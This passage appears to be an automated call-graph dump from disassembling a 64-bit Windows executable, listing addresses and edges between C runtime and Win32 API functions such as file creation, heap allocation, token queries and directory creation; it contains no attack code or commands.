7ff7ff5aae6e 19107 7ff7ff5aae87 19106->19107 19108 7ff7ff5aae7d 19106->19108 19110 7ff7ff5a03a8 LeaveCriticalSection 19108->19110 19115 7ff7ff59b040 19116 7ff7ff59b045 19115->19116 19120 7ff7ff59b05a 19115->19120 19121 7ff7ff59b060 19116->19121 19122 7ff7ff59b0a2 19121->19122 19123 7ff7ff59b0aa 19121->19123 19124 7ff7ff59a9b8 __free_lconv_num 11 API calls 19122->19124 19125 7ff7ff59a9b8 __free_lconv_num 11 API calls 19123->19125 19124->19123 19126 7ff7ff59b0b7 19125->19126 19127 7ff7ff59a9b8 __free_lconv_num 11 API calls 19126->19127 19128 7ff7ff59b0c4 19127->19128 19129 7ff7ff59a9b8 __free_lconv_num 11 API calls 19128->19129 19130 7ff7ff59b0d1 19129->19130 19131 7ff7ff59a9b8 __free_lconv_num 11 API calls 19130->19131 19132 7ff7ff59b0de 19131->19132 19133 7ff7ff59a9b8 __free_lconv_num 11 API calls 19132->19133 19134 7ff7ff59b0eb 19133->19134 19135 7ff7ff59a9b8 __free_lconv_num 11 API calls 19134->19135 19136 7ff7ff59b0f8 19135->19136 19137 7ff7ff59a9b8 __free_lconv_num 11 API calls 19136->19137 19138 7ff7ff59b105 19137->19138 19139 7ff7ff59a9b8 __free_lconv_num 11 API calls 19138->19139 19140 7ff7ff59b115 19139->19140 19141 7ff7ff59a9b8 __free_lconv_num 11 API calls 19140->19141 19142 7ff7ff59b125 19141->19142 19147 7ff7ff59af04 19142->19147 19161 7ff7ff5a0348 EnterCriticalSection 19147->19161 20516 7ff7ff599dc0 20519 7ff7ff599d3c 20516->20519 20526 7ff7ff5a0348 EnterCriticalSection 20519->20526 20530 7ff7ff58cbc0 20531 7ff7ff58cbd0 20530->20531 20547 7ff7ff599c18 20531->20547 20533 7ff7ff58cbdc 20553 7ff7ff58ceb8 20533->20553 20535 7ff7ff58cbf4 _RTC_Initialize 20545 7ff7ff58cc49 20535->20545 20558 7ff7ff58d068 20535->20558 20536 7ff7ff58d19c 7 API calls 20537 7ff7ff58cc75 20536->20537 20539 7ff7ff58cc09 20561 7ff7ff599084 20539->20561 20545->20536 20546 7ff7ff58cc65 20545->20546 20548 7ff7ff599c29 20547->20548 20549 7ff7ff599c31 20548->20549 20550 7ff7ff594f78 _set_fmode 11 API calls 20548->20550 20549->20533 20551 7ff7ff599c40 20550->20551 20552 7ff7ff59a950 
_invalid_parameter_noinfo 37 API calls 20551->20552 20552->20549 20554 7ff7ff58cec9 20553->20554 20557 7ff7ff58cece __scrt_acquire_startup_lock 20553->20557 20555 7ff7ff58d19c 7 API calls 20554->20555 20554->20557 20556 7ff7ff58cf42 20555->20556 20557->20535 20586 7ff7ff58d02c 20558->20586 20560 7ff7ff58d071 20560->20539 20562 7ff7ff5990a4 20561->20562 20563 7ff7ff58cc15 20561->20563 20564 7ff7ff5990c2 GetModuleFileNameW 20562->20564 20565 7ff7ff5990ac 20562->20565 20563->20545 20585 7ff7ff58d13c InitializeSListHead 20563->20585 20569 7ff7ff5990ed 20564->20569 20566 7ff7ff594f78 _set_fmode 11 API calls 20565->20566 20567 7ff7ff5990b1 20566->20567 20568 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 20567->20568 20568->20563 20570 7ff7ff599024 11 API calls 20569->20570 20571 7ff7ff59912d 20570->20571 20572 7ff7ff599135 20571->20572 20577 7ff7ff59914d 20571->20577 20573 7ff7ff594f78 _set_fmode 11 API calls 20572->20573 20574 7ff7ff59913a 20573->20574 20575 7ff7ff59a9b8 __free_lconv_num 11 API calls 20574->20575 20575->20563 20576 7ff7ff59916f 20578 7ff7ff59a9b8 __free_lconv_num 11 API calls 20576->20578 20577->20576 20579 7ff7ff5991b4 20577->20579 20580 7ff7ff59919b 20577->20580 20578->20563 20582 7ff7ff59a9b8 __free_lconv_num 11 API calls 20579->20582 20581 7ff7ff59a9b8 __free_lconv_num 11 API calls 20580->20581 20583 7ff7ff5991a4 20581->20583 20582->20576 20584 7ff7ff59a9b8 __free_lconv_num 11 API calls 20583->20584 20584->20563 20587 7ff7ff58d046 20586->20587 20588 7ff7ff58d03f 20586->20588 20590 7ff7ff59a25c 20587->20590 20588->20560 20593 7ff7ff599e98 20590->20593 20600 7ff7ff5a0348 EnterCriticalSection 20593->20600 15937 7ff7ff58bb50 15938 7ff7ff58bb7e 15937->15938 15939 7ff7ff58bb65 15937->15939 15939->15938 15942 7ff7ff59d66c 15939->15942 15943 7ff7ff59d6b7 15942->15943 15948 7ff7ff59d67b _set_fmode 15942->15948 15952 7ff7ff594f78 15943->15952 15945 7ff7ff59d69e HeapAlloc 15946 7ff7ff58bbde 15945->15946 15945->15948 15948->15943 15948->15945 15949 
7ff7ff5a3600 15948->15949 15955 7ff7ff5a3640 15949->15955 15961 7ff7ff59b338 GetLastError 15952->15961 15954 7ff7ff594f81 15954->15946 15960 7ff7ff5a0348 EnterCriticalSection 15955->15960 15962 7ff7ff59b379 FlsSetValue 15961->15962 15966 7ff7ff59b35c 15961->15966 15963 7ff7ff59b38b 15962->15963 15967 7ff7ff59b369 SetLastError 15962->15967 15978 7ff7ff59ec08 15963->15978 15966->15962 15966->15967 15967->15954 15968 7ff7ff59b39a 15969 7ff7ff59b3b8 FlsSetValue 15968->15969 15970 7ff7ff59b3a8 FlsSetValue 15968->15970 15972 7ff7ff59b3c4 FlsSetValue 15969->15972 15973 7ff7ff59b3d6 15969->15973 15971 7ff7ff59b3b1 15970->15971 15985 7ff7ff59a9b8 15971->15985 15972->15971 15991 7ff7ff59af64 15973->15991 15983 7ff7ff59ec19 _set_fmode 15978->15983 15979 7ff7ff59ec6a 15982 7ff7ff594f78 _set_fmode 10 API calls 15979->15982 15980 7ff7ff59ec4e HeapAlloc 15981 7ff7ff59ec68 15980->15981 15980->15983 15981->15968 15982->15981 15983->15979 15983->15980 15984 7ff7ff5a3600 _set_fmode 2 API calls 15983->15984 15984->15983 15986 7ff7ff59a9ec 15985->15986 15987 7ff7ff59a9bd RtlFreeHeap 15985->15987 15986->15967 15987->15986 15988 7ff7ff59a9d8 GetLastError 15987->15988 15989 7ff7ff59a9e5 __free_lconv_num 15988->15989 15990 7ff7ff594f78 _set_fmode 9 API calls 15989->15990 15990->15986 15996 7ff7ff59ae3c 15991->15996 16008 7ff7ff5a0348 EnterCriticalSection 15996->16008 16010 7ff7ff5999d1 16022 7ff7ff59a448 16010->16022 16027 7ff7ff59b1c0 GetLastError 16022->16027 16028 7ff7ff59b201 FlsSetValue 16027->16028 16029 7ff7ff59b1e4 FlsGetValue 16027->16029 16030 7ff7ff59b213 16028->16030 16031 7ff7ff59b1f1 16028->16031 16029->16031 16032 7ff7ff59b1fb 16029->16032 16034 7ff7ff59ec08 _set_fmode 11 API calls 16030->16034 16033 7ff7ff59b26d SetLastError 16031->16033 16032->16028 16036 7ff7ff59a451 16033->16036 16037 7ff7ff59b28d 16033->16037 16035 7ff7ff59b222 16034->16035 16039 7ff7ff59b240 FlsSetValue 16035->16039 16040 7ff7ff59b230 FlsSetValue 16035->16040 16049 7ff7ff59a574 16036->16049 16038 
7ff7ff59a574 __FrameHandler3::FrameUnwindToEmptyState 38 API calls 16037->16038 16041 7ff7ff59b292 16038->16041 16043 7ff7ff59b24c FlsSetValue 16039->16043 16044 7ff7ff59b25e 16039->16044 16042 7ff7ff59b239 16040->16042 16045 7ff7ff59a9b8 __free_lconv_num 11 API calls 16042->16045 16043->16042 16046 7ff7ff59af64 _set_fmode 11 API calls 16044->16046 16045->16031 16047 7ff7ff59b266 16046->16047 16048 7ff7ff59a9b8 __free_lconv_num 11 API calls 16047->16048 16048->16033 16058 7ff7ff5a36c0 16049->16058 16092 7ff7ff5a3678 16058->16092 16097 7ff7ff5a0348 EnterCriticalSection 16092->16097 19163 7ff7ff5aac53 19164 7ff7ff5aac63 19163->19164 19167 7ff7ff5954e8 LeaveCriticalSection 19164->19167 20286 7ff7ff5a1720 20297 7ff7ff5a7454 20286->20297 20298 7ff7ff5a7461 20297->20298 20299 7ff7ff59a9b8 __free_lconv_num 11 API calls 20298->20299 20300 7ff7ff5a747d 20298->20300 20299->20298 20301 7ff7ff59a9b8 __free_lconv_num 11 API calls 20300->20301 20302 7ff7ff5a1729 20300->20302 20301->20300 20303 7ff7ff5a0348 EnterCriticalSection 20302->20303 16162 7ff7ff595698 16163 7ff7ff5956cf 16162->16163 16164 7ff7ff5956b2 16162->16164 16163->16164 16166 7ff7ff5956e2 CreateFileW 16163->16166 16187 7ff7ff594f58 16164->16187 16167 7ff7ff595716 16166->16167 16168 7ff7ff59574c 16166->16168 16190 7ff7ff5957ec GetFileType 16167->16190 16216 7ff7ff595c74 16168->16216 16172 7ff7ff594f78 _set_fmode 11 API calls 16175 7ff7ff5956bf 16172->16175 16180 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 16175->16180 16176 7ff7ff595741 CloseHandle 16181 7ff7ff5956ca 16176->16181 16177 7ff7ff59572b CloseHandle 16177->16181 16178 7ff7ff595780 16242 7ff7ff595a34 16178->16242 16179 7ff7ff595755 16237 7ff7ff594eec 16179->16237 16180->16181 16186 7ff7ff59575f 16186->16181 16188 7ff7ff59b338 _set_fmode 11 API calls 16187->16188 16189 7ff7ff594f61 16188->16189 16189->16172 16191 7ff7ff5958f7 16190->16191 16192 7ff7ff59583a 16190->16192 16194 7ff7ff5958ff 16191->16194 16195 7ff7ff595921 16191->16195 16193 
7ff7ff595866 GetFileInformationByHandle 16192->16193 16196 7ff7ff595b70 21 API calls 16192->16196 16197 7ff7ff59588f 16193->16197 16198 7ff7ff595912 GetLastError 16193->16198 16194->16198 16199 7ff7ff595903 16194->16199 16200 7ff7ff595944 PeekNamedPipe 16195->16200 16214 7ff7ff5958e2 16195->16214 16205 7ff7ff595854 16196->16205 16201 7ff7ff595a34 51 API calls 16197->16201 16203 7ff7ff594eec _fread_nolock 11 API calls 16198->16203 16202 7ff7ff594f78 _set_fmode 11 API calls 16199->16202 16200->16214 16206 7ff7ff59589a 16201->16206 16202->16214 16203->16214 16204 7ff7ff58c5c0 _log10_special 8 API calls 16207 7ff7ff595724 16204->16207 16205->16193 16205->16214 16259 7ff7ff595994 16206->16259 16207->16176 16207->16177 16210 7ff7ff595994 10 API calls 16211 7ff7ff5958b9 16210->16211 16212 7ff7ff595994 10 API calls 16211->16212 16213 7ff7ff5958ca 16212->16213 16213->16214 16215 7ff7ff594f78 _set_fmode 11 API calls 16213->16215 16214->16204 16215->16214 16217 7ff7ff595caa 16216->16217 16218 7ff7ff594f78 _set_fmode 11 API calls 16217->16218 16236 7ff7ff595d42 __std_exception_destroy 16217->16236 16220 7ff7ff595cbc 16218->16220 16219 7ff7ff58c5c0 _log10_special 8 API calls 16221 7ff7ff595751 16219->16221 16222 7ff7ff594f78 _set_fmode 11 API calls 16220->16222 16221->16178 16221->16179 16223 7ff7ff595cc4 16222->16223 16266 7ff7ff597e78 16223->16266 16225 7ff7ff595cd9 16226 7ff7ff595ce1 16225->16226 16227 7ff7ff595ceb 16225->16227 16228 7ff7ff594f78 _set_fmode 11 API calls 16226->16228 16229 7ff7ff594f78 _set_fmode 11 API calls 16227->16229 16233 7ff7ff595ce6 16228->16233 16230 7ff7ff595cf0 16229->16230 16231 7ff7ff594f78 _set_fmode 11 API calls 16230->16231 16230->16236 16232 7ff7ff595cfa 16231->16232 16234 7ff7ff597e78 45 API calls 16232->16234 16235 7ff7ff595d34 GetDriveTypeW 16233->16235 16233->16236 16234->16233 16235->16236 16236->16219 16238 7ff7ff59b338 _set_fmode 11 API calls 16237->16238 16239 7ff7ff594ef9 __free_lconv_num 16238->16239 16240 7ff7ff59b338 _set_fmode 11 
17417 7ff7ff58c5c0 _log10_special 8 API calls 17416->17417 17418 7ff7ff5826a0 17417->17418 17418->17346 17420 7ff7ff592cbe 17419->17420 17421 7ff7ff592cae 17419->17421 17422 7ff7ff592cc7 17420->17422 17429 7ff7ff592cf5 17420->17429 17425 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17421->17425 17423 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17422->17423 17424 7ff7ff592ced 17423->17424 17424->17391 17424->17392 17424->17393 17424->17394 17425->17424 17426 7ff7ff594830 45 API calls 17426->17429 17428 7ff7ff592fa4 17431 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17428->17431 17429->17421 17429->17424 17429->17426 17429->17428 17433 7ff7ff593610 17429->17433 17459 7ff7ff5932d8 17429->17459 17489 7ff7ff592b60 17429->17489 17431->17421 17434 7ff7ff593652 17433->17434 17435 7ff7ff5936c5 17433->17435 17436 7ff7ff5936ef 17434->17436 17437 7ff7ff593658 17434->17437 17438 7ff7ff59371f 17435->17438 17439 7ff7ff5936ca 17435->17439 17506 7ff7ff591bc0 17436->17506 17445 7ff7ff59365d 17437->17445 17448 7ff7ff59372e 17437->17448 17438->17436 17438->17448 17457 7ff7ff593688 17438->17457 17440 7ff7ff5936ff 17439->17440 17441 7ff7ff5936cc 17439->17441 17513 7ff7ff5917b0 17440->17513 17442 7ff7ff59366d 17441->17442 17447 7ff7ff5936db 17441->17447 17458 7ff7ff59375d 17442->17458 17492 7ff7ff593f74 17442->17492 17445->17442 17449 7ff7ff5936a0 17445->17449 17445->17457 17447->17436 17451 7ff7ff5936e0 17447->17451 17448->17458 17520 7ff7ff591fd0 17448->17520 17449->17458 17502 7ff7ff594430 17449->17502 17454 7ff7ff5945c8 37 API calls 17451->17454 17451->17458 17453 7ff7ff58c5c0 _log10_special 8 API calls 17455 7ff7ff5939f3 17453->17455 17454->17457 17455->17429 17457->17458 17527 7ff7ff59e8c8 17457->17527 17458->17453 17460 7ff7ff5932e3 17459->17460 17461 7ff7ff5932f9 17459->17461 17463 7ff7ff593652 17460->17463 17464 7ff7ff5936c5 17460->17464 17477 7ff7ff593337 17460->17477 17462 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17461->17462 17461->17477 
17462->17477 17465 7ff7ff5936ef 17463->17465 17466 7ff7ff593658 17463->17466 17467 7ff7ff59371f 17464->17467 17468 7ff7ff5936ca 17464->17468 17472 7ff7ff591bc0 38 API calls 17465->17472 17475 7ff7ff59365d 17466->17475 17479 7ff7ff59372e 17466->17479 17467->17465 17467->17479 17487 7ff7ff593688 17467->17487 17469 7ff7ff5936ff 17468->17469 17470 7ff7ff5936cc 17468->17470 17473 7ff7ff5917b0 38 API calls 17469->17473 17471 7ff7ff59366d 17470->17471 17476 7ff7ff5936db 17470->17476 17474 7ff7ff593f74 47 API calls 17471->17474 17488 7ff7ff59375d 17471->17488 17472->17487 17473->17487 17474->17487 17475->17471 17478 7ff7ff5936a0 17475->17478 17475->17487 17476->17465 17481 7ff7ff5936e0 17476->17481 17477->17429 17482 7ff7ff594430 47 API calls 17478->17482 17478->17488 17480 7ff7ff591fd0 38 API calls 17479->17480 17479->17488 17480->17487 17484 7ff7ff5945c8 37 API calls 17481->17484 17481->17488 17482->17487 17483 7ff7ff58c5c0 _log10_special 8 API calls 17485 7ff7ff5939f3 17483->17485 17484->17487 17485->17429 17486 7ff7ff59e8c8 47 API calls 17486->17487 17487->17486 17487->17488 17488->17483 17540 7ff7ff590d84 17489->17540 17493 7ff7ff593f96 17492->17493 17494 7ff7ff590bf0 12 API calls 17493->17494 17495 7ff7ff593fde 17494->17495 17496 7ff7ff59e5e0 46 API calls 17495->17496 17497 7ff7ff5940b1 17496->17497 17498 7ff7ff594830 45 API calls 17497->17498 17499 7ff7ff5940d3 17497->17499 17498->17499 17500 7ff7ff594830 45 API calls 17499->17500 17501 7ff7ff59415c 17499->17501 17500->17501 17501->17457 17503 7ff7ff594448 17502->17503 17505 7ff7ff5944b0 17502->17505 17504 7ff7ff59e8c8 47 API calls 17503->17504 17503->17505 17504->17505 17505->17457 17507 7ff7ff591bf3 17506->17507 17508 7ff7ff591c22 17507->17508 17510 7ff7ff591cdf 17507->17510 17509 7ff7ff590bf0 12 API calls 17508->17509 17512 7ff7ff591c5f 17508->17512 17509->17512 17511 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17510->17511 17511->17512 17512->17457 17514 7ff7ff5917e3 17513->17514 17515 7ff7ff591812 
17514->17515 17517 7ff7ff5918cf 17514->17517 17516 7ff7ff590bf0 12 API calls 17515->17516 17519 7ff7ff59184f 17515->17519 17516->17519 17518 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17517->17518 17518->17519 17519->17457 17521 7ff7ff592003 17520->17521 17522 7ff7ff592032 17521->17522 17524 7ff7ff5920ef 17521->17524 17523 7ff7ff590bf0 12 API calls 17522->17523 17526 7ff7ff59206f 17522->17526 17523->17526 17525 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17524->17525 17525->17526 17526->17457 17528 7ff7ff59e8f0 17527->17528 17529 7ff7ff59e91e __scrt_get_show_window_mode 17528->17529 17530 7ff7ff59e935 17528->17530 17531 7ff7ff594830 45 API calls 17528->17531 17533 7ff7ff59e8f5 __scrt_get_show_window_mode 17528->17533 17532 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17529->17532 17529->17533 17530->17529 17530->17533 17537 7ff7ff5a0858 17530->17537 17531->17530 17532->17533 17533->17457 17539 7ff7ff5a087c WideCharToMultiByte 17537->17539 17541 7ff7ff590db1 17540->17541 17542 7ff7ff590dc3 17540->17542 17543 7ff7ff594f78 _set_fmode 11 API calls 17541->17543 17544 7ff7ff590dd0 17542->17544 17550 7ff7ff590e0d 17542->17550 17545 7ff7ff590db6 17543->17545 17546 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17544->17546 17547 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 17545->17547 17548 7ff7ff590dc1 17546->17548 17547->17548 17548->17429 17549 7ff7ff590eb6 17549->17548 17552 7ff7ff594f78 _set_fmode 11 API calls 17549->17552 17550->17549 17551 7ff7ff594f78 _set_fmode 11 API calls 17550->17551 17553 7ff7ff590eab 17551->17553 17554 7ff7ff590f60 17552->17554 17555 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 17553->17555 17556 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 17554->17556 17555->17549 17556->17548 17562 7ff7ff59ecad 17557->17562 17558 7ff7ff59ecb2 17559 7ff7ff59524d 17558->17559 17560 7ff7ff594f78 _set_fmode 11 API calls 17558->17560 17559->17407 17559->17408 17561 7ff7ff59ecbc 17560->17561 17563 7ff7ff59a950 
_invalid_parameter_noinfo 37 API calls 17561->17563 17562->17558 17562->17559 17564 7ff7ff59ecfc 17562->17564 17563->17559 17564->17559 17565 7ff7ff594f78 _set_fmode 11 API calls 17564->17565 17565->17561 17567 7ff7ff5887a1 GetTokenInformation 17566->17567 17568 7ff7ff588823 __std_exception_destroy 17566->17568 17569 7ff7ff5887c2 GetLastError 17567->17569 17572 7ff7ff5887cd 17567->17572 17570 7ff7ff588836 CloseHandle 17568->17570 17571 7ff7ff58883c 17568->17571 17569->17568 17569->17572 17570->17571 17571->16714 17572->17568 17573 7ff7ff5887e9 GetTokenInformation 17572->17573 17573->17568 17574 7ff7ff58880c 17573->17574 17574->17568 17575 7ff7ff588816 ConvertSidToStringSidW 17574->17575 17575->17568 17577 7ff7ff58c8c0 17576->17577 17578 7ff7ff582b74 GetCurrentProcessId 17577->17578 17579 7ff7ff5826b0 48 API calls 17578->17579 17580 7ff7ff582bc7 17579->17580 17581 7ff7ff594c48 48 API calls 17580->17581 17582 7ff7ff582c10 MessageBoxW 17581->17582 17583 7ff7ff58c5c0 _log10_special 8 API calls 17582->17583 17584 7ff7ff582c40 17583->17584 17584->16724 17586 7ff7ff5825e5 17585->17586 17587 7ff7ff594c48 48 API calls 17586->17587 17588 7ff7ff582604 17587->17588 17588->16740 17634 7ff7ff598804 17589->17634 17593 7ff7ff5881cc 17592->17593 17594 7ff7ff589400 2 API calls 17593->17594 17595 7ff7ff5881eb 17594->17595 17596 7ff7ff5881f3 17595->17596 17597 7ff7ff588206 ExpandEnvironmentStringsW 17595->17597 17598 7ff7ff582810 49 API calls 17596->17598 17599 7ff7ff58822c __std_exception_destroy 17597->17599 17600 7ff7ff5881ff __std_exception_destroy 17598->17600 17601 7ff7ff588230 17599->17601 17604 7ff7ff588243 17599->17604 17602 7ff7ff58c5c0 _log10_special 8 API calls 17600->17602 17603 7ff7ff582810 49 API calls 17601->17603 17605 7ff7ff58839f 17602->17605 17603->17600 17606 7ff7ff5882af 17604->17606 17607 7ff7ff588251 GetDriveTypeW 17604->17607 17605->16738 17624 7ff7ff5982a8 17605->17624 17608 7ff7ff597e78 45 API calls 17606->17608 17611 7ff7ff5882a0 17607->17611 17612 
7ff7ff588285 17607->17612 17610 7ff7ff5882c1 17608->17610 17613 7ff7ff5882c9 17610->17613 17617 7ff7ff5882dc 17610->17617 17757 7ff7ff5979dc 17611->17757 17614 7ff7ff582810 49 API calls 17612->17614 17616 7ff7ff582810 49 API calls 17613->17616 17614->17600 17616->17600 17618 7ff7ff58833e CreateDirectoryW 17617->17618 17619 7ff7ff5826b0 48 API calls 17617->17619 17618->17600 17620 7ff7ff58834d GetLastError 17618->17620 17621 7ff7ff588318 CreateDirectoryW 17619->17621 17620->17600 17622 7ff7ff58835a GetLastError 17620->17622 17621->17617 17623 7ff7ff582c50 51 API calls 17622->17623 17623->17600 17625 7ff7ff5982b5 17624->17625 17626 7ff7ff5982c8 17624->17626 17627 7ff7ff594f78 _set_fmode 11 API calls 17625->17627 17773 7ff7ff597f2c 17626->17773 17629 7ff7ff5982ba 17627->17629 17631 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 17629->17631 17632 7ff7ff5982c6 17631->17632 17632->16742 17675 7ff7ff5a15c8 17634->17675 17734 7ff7ff5a1340 17675->17734 17755 7ff7ff5a0348 EnterCriticalSection 17734->17755 17758 7ff7ff5979fa 17757->17758 17761 7ff7ff597a2d 17757->17761 17758->17761 17764 7ff7ff5a04e4 17758->17764 17761->17600 17762 7ff7ff59a970 _isindst 17 API calls 17763 7ff7ff597a5d 17762->17763 17765 7ff7ff5a04f1 17764->17765 17766 7ff7ff5a04fb 17764->17766 17765->17766 17771 7ff7ff5a0517 17765->17771 17767 7ff7ff594f78 _set_fmode 11 API calls 17766->17767 17768 7ff7ff5a0503 17767->17768 17769 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 17768->17769 17770 7ff7ff597a29 17769->17770 17770->17761 17770->17762 17771->17770 17772 7ff7ff594f78 _set_fmode 11 API calls 17771->17772 17772->17768 17780 7ff7ff5a0348 EnterCriticalSection 17773->17780 17782 7ff7ff58455a 17781->17782 17783 7ff7ff589400 2 API calls 17782->17783 17784 7ff7ff58457f 17783->17784 17785 7ff7ff58c5c0 _log10_special 8 API calls 17784->17785 17786 7ff7ff5845a7 17785->17786 17786->16777 17789 7ff7ff587e1e 17787->17789 17788 7ff7ff587f42 17792 7ff7ff58c5c0 _log10_special 8 API calls 17788->17792 
17789->17788 17790 7ff7ff581c80 49 API calls 17789->17790 17791 7ff7ff587ea5 17790->17791 17791->17788 17794 7ff7ff581c80 49 API calls 17791->17794 17795 7ff7ff584550 10 API calls 17791->17795 17796 7ff7ff587efb 17791->17796 17793 7ff7ff587f73 17792->17793 17793->16777 17794->17791 17795->17791 17797 7ff7ff589400 2 API calls 17796->17797 17798 7ff7ff587f13 CreateDirectoryW 17797->17798 17798->17788 17798->17791 17800 7ff7ff581637 17799->17800 17801 7ff7ff581613 17799->17801 17803 7ff7ff5845b0 108 API calls 17800->17803 17920 7ff7ff581050 17801->17920 17805 7ff7ff58164b 17803->17805 17804 7ff7ff581618 17806 7ff7ff58162e 17804->17806 17810 7ff7ff582710 54 API calls 17804->17810 17807 7ff7ff581653 17805->17807 17808 7ff7ff581682 17805->17808 17806->16777 17811 7ff7ff594f78 _set_fmode 11 API calls 17807->17811 17809 7ff7ff5845b0 108 API calls 17808->17809 17812 7ff7ff581696 17809->17812 17810->17806 17813 7ff7ff581658 17811->17813 17814 7ff7ff58169e 17812->17814 17815 7ff7ff5816b8 17812->17815 17816 7ff7ff582910 54 API calls 17813->17816 17817 7ff7ff582710 54 API calls 17814->17817 17818 7ff7ff590744 73 API calls 17815->17818 17819 7ff7ff581671 17816->17819 17820 7ff7ff5816ae 17817->17820 17821 7ff7ff5816cd 17818->17821 17819->16777 17824 7ff7ff5900bc 74 API calls 17820->17824 17822 7ff7ff5816f9 17821->17822 17823 7ff7ff5816d1 17821->17823 17826 7ff7ff581717 17822->17826 17827 7ff7ff5816ff 17822->17827 17825 7ff7ff594f78 _set_fmode 11 API calls 17823->17825 17828 7ff7ff581829 17824->17828 17829 7ff7ff5816d6 17825->17829 17832 7ff7ff581739 17826->17832 17842 7ff7ff581761 17826->17842 17898 7ff7ff581210 17827->17898 17828->16777 17831 7ff7ff582910 54 API calls 17829->17831 17838 7ff7ff5816ef __std_exception_destroy 17831->17838 17834 7ff7ff594f78 _set_fmode 11 API calls 17832->17834 17833 7ff7ff5900bc 74 API calls 17833->17820 17835 7ff7ff58173e 17834->17835 17836 7ff7ff582910 54 API calls 17835->17836 17836->17838 17837 7ff7ff59040c _fread_nolock 53 API calls 
17837->17842 17838->17833 17839 7ff7ff5817da 17840 7ff7ff594f78 _set_fmode 11 API calls 17839->17840 17843 7ff7ff5817ca 17840->17843 17842->17837 17842->17838 17842->17839 17844 7ff7ff5817c5 17842->17844 17951 7ff7ff590b4c 17842->17951 17846 7ff7ff582910 54 API calls 17843->17846 17845 7ff7ff594f78 _set_fmode 11 API calls 17844->17845 17845->17843 17846->17838 17848 7ff7ff58717b 17847->17848 17850 7ff7ff587134 17847->17850 17848->16777 17850->17848 17984 7ff7ff595094 17850->17984 17852 7ff7ff584191 17851->17852 17853 7ff7ff5844d0 49 API calls 17852->17853 17854 7ff7ff5841cb 17853->17854 17855 7ff7ff5844d0 49 API calls 17854->17855 17856 7ff7ff5841db 17855->17856 17857 7ff7ff5841fd 17856->17857 17858 7ff7ff58422c 17856->17858 17999 7ff7ff584100 17857->17999 17860 7ff7ff584100 51 API calls 17858->17860 17861 7ff7ff58422a 17860->17861 17862 7ff7ff58428c 17861->17862 17863 7ff7ff584257 17861->17863 17865 7ff7ff584100 51 API calls 17862->17865 18006 7ff7ff587ce0 17863->18006 17866 7ff7ff5842b0 17865->17866 17869 7ff7ff584100 51 API calls 17866->17869 17880 7ff7ff584302 17866->17880 17868 7ff7ff584287 17874 7ff7ff58c5c0 _log10_special 8 API calls 17868->17874 17872 7ff7ff5842d9 17869->17872 17870 7ff7ff584383 17873 7ff7ff581950 115 API calls 17870->17873 17871 7ff7ff582710 54 API calls 17871->17868 17877 7ff7ff584100 51 API calls 17872->17877 17872->17880 17875 7ff7ff58438d 17873->17875 17876 7ff7ff584425 17874->17876 17878 7ff7ff5843ee 17875->17878 17879 7ff7ff584395 17875->17879 17876->16777 17877->17880 17881 7ff7ff582710 54 API calls 17878->17881 18032 7ff7ff581840 17879->18032 17880->17870 17882 7ff7ff58437c 17880->17882 17883 7ff7ff584307 17880->17883 17885 7ff7ff58436b 17880->17885 17881->17883 17882->17879 17882->17883 17888 7ff7ff582710 54 API calls 17883->17888 17887 7ff7ff582710 54 API calls 17885->17887 17887->17883 17888->17868 17889 7ff7ff5843ac 17892 7ff7ff582710 54 API calls 17889->17892 17890 7ff7ff5843c2 17891 7ff7ff581600 118 API calls 17890->17891 
17893 7ff7ff5843d0 17891->17893 17892->17868 17893->17868 17894 7ff7ff582710 54 API calls 17893->17894 17894->17868 17896 7ff7ff581c80 49 API calls 17895->17896 17897 7ff7ff584464 17896->17897 17897->16777 17899 7ff7ff581268 17898->17899 17900 7ff7ff581297 17899->17900 17901 7ff7ff58126f 17899->17901 17904 7ff7ff5812d4 17900->17904 17905 7ff7ff5812b1 17900->17905 17902 7ff7ff582710 54 API calls 17901->17902 17903 7ff7ff581282 17902->17903 17903->17838 17909 7ff7ff5812e6 17904->17909 17914 7ff7ff581309 memcpy_s 17904->17914 17906 7ff7ff594f78 _set_fmode 11 API calls 17905->17906 17907 7ff7ff5812b6 17906->17907 17908 7ff7ff582910 54 API calls 17907->17908 17915 7ff7ff5812cf __std_exception_destroy 17908->17915 17910 7ff7ff594f78 _set_fmode 11 API calls 17909->17910 17911 7ff7ff5812eb 17910->17911 17913 7ff7ff582910 54 API calls 17911->17913 17912 7ff7ff59040c _fread_nolock 53 API calls 17912->17914 17913->17915 17914->17912 17914->17915 17916 7ff7ff5813cf 17914->17916 17918 7ff7ff590b4c 76 API calls 17914->17918 17919 7ff7ff590180 37 API calls 17914->17919 17915->17838 17917 7ff7ff582710 54 API calls 17916->17917 17917->17915 17918->17914 17919->17914 17921 7ff7ff5845b0 108 API calls 17920->17921 17922 7ff7ff58108c 17921->17922 17923 7ff7ff5810a9 17922->17923 17924 7ff7ff581094 17922->17924 17925 7ff7ff590744 73 API calls 17923->17925 17926 7ff7ff582710 54 API calls 17924->17926 17927 7ff7ff5810bf 17925->17927 17932 7ff7ff5810a4 __std_exception_destroy 17926->17932 17928 7ff7ff5810e6 17927->17928 17929 7ff7ff5810c3 17927->17929 17934 7ff7ff5810f7 17928->17934 17935 7ff7ff581122 17928->17935 17930 7ff7ff594f78 _set_fmode 11 API calls 17929->17930 17931 7ff7ff5810c8 17930->17931 17933 7ff7ff582910 54 API calls 17931->17933 17932->17804 17941 7ff7ff5810e1 __std_exception_destroy 17933->17941 17937 7ff7ff594f78 _set_fmode 11 API calls 17934->17937 17936 7ff7ff581129 17935->17936 17945 7ff7ff58113c 17935->17945 17938 7ff7ff581210 92 API calls 17936->17938 17939 
